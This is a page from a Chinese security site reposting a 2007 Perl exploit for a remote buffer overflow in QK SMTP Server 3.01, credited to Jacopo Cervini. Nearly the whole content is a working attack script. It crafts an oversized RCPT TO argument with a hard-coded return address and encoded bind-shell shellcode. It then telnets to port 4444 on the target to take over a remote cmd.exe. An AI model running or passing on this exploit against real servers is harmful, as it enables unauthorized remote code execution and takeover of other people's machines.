首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit (pl)
来源:http://www.securityfocus.com/bid/20681 作者:Jacopo 发布时间:2007-01-02  

#!/bin/perl
#
#http://www.securityfocus.com/bid/20681
#
# tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal
# bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit
# credit to Greg Linares for discovered the vulnerability
# thanks to hdm and vlads902 for original shellcode;encoded using Skylined alpha2 tool
# Jacopo Cervini aka acaro [at] jervus.it


if (@ARGV < 1) {
print "--------------------------------------------------------------------\n";
print "Usage : qksmtp-rcpt-overflow-4444.pl TargetIPAddress \n";
print " Example : ./qksmtp-rcpt-overflow-4444.pl 127.0.0.1 \n";
print "--------------------------------------------------------------------\n";
}

use IO::Socket::INET;

my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
#my $eip="\x43\x43\x43\x43";

my $eip="\x8f\x29\x46\x00"; #call esp in QKSmtpServer3.exe

$sc=
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZ".
"BABABABABkMAGB9u4JBYlQZjKNmiXkIyokOkOOptKplmTo4RkQ5oL2kCLm5PxkQJORkPOLX4KOoKpIqjKOYtKP4DKkQZNp1upryVLqtWP".
"44LGWQgZjmjaXBJKL4MkntktnHt5IURkqOnDkQzKqVRkLLNkRkQOMLM1xkm3NLTKQyBLO4mLoqy3lqIK34rkmsLptKQ0LL4KppmL4mdKM".
"pKXOnaX4N0NLNjLNpKOz6ovOcRFOxlsOBphSGRSoBaOOdkOXPRH8KjMKLOKpPkO6vQOTIXeOve1JMm8JbnuqZKRkOHPbH7izizUvMPWYo".
"6vnsOcQCb3PSMsNsOSNskOfp1VqXLQ1LrFnsu99QTUQXTdMJ2PewqGkOVvqZZpnqPUkOXPph3tTmNNZINwKO6vns0UKO6pOxIUoYBfa9r".
"7Yo6vb00TOdR5YoHP3cRHgwRYGVbYnwkOJ6OeyoJ0s60j1T36OxqSrMU9jEozPPPYNIxLQyzGrJmtriYRnQGPZSdjkNORlmynMrnL63Bm".
"PznXvKFKVKqXPrKNvSMFyoD5Mtyo6vqKPWPRPQoaNqbJkQpQpQoepQKOfpOxtmz9m58NNsiovv2JYoyoLw9oVpDK27ilqsvds4KOWfpRk".
"OvpOxhp1zitOonsKOyFKO6pA";


$jmpback = "\x50\x73".
"\x54\x73".
"\x58\x73".
"\xb0".
"\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x50\x73".
"\xc3\x73";

my $buffer =("\x41"x296).$eip.("\x73"x2228).$sc.("\x45"x820).$jmpback."\x00";

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;


$request = "helo acaro" . "\r\n";
send $socket, $request, 0;
print "[+] Sent helo request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);

$request = "mail from: acaro@peaceandlove.peace" . "\r\n";
send $socket, $request, 0;
print "[+] Sent mail from request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);

$request = "rcpt to: " . $buffer . "\r\n";
send $socket, $request, 0;
print "[+] Sent rcpt to request\n";

print " + connect on 4444 port of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple Quicktime (rtsp URL Hand
·TaskTracker <= 1.5 (Customi
·Formbankserver 1.9 (Name) Dire
·Pheap CMS <= 1.1 (lpref) Re
·Rediff Bol Downloader (ActiveX
·TIBCO Rendezvous <= 7.4.11
·Fishyshoop <= 0.930b Remote
·TIBCO Rendezvous <= 7.4.11
·Ciberia Content Federator 1.0
·PowerZip <= 7.06.3895 Long
·MTCMS <= 2.0 (admin/admin_s
·TikiWiki <= 1.9 Sirius (jho
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved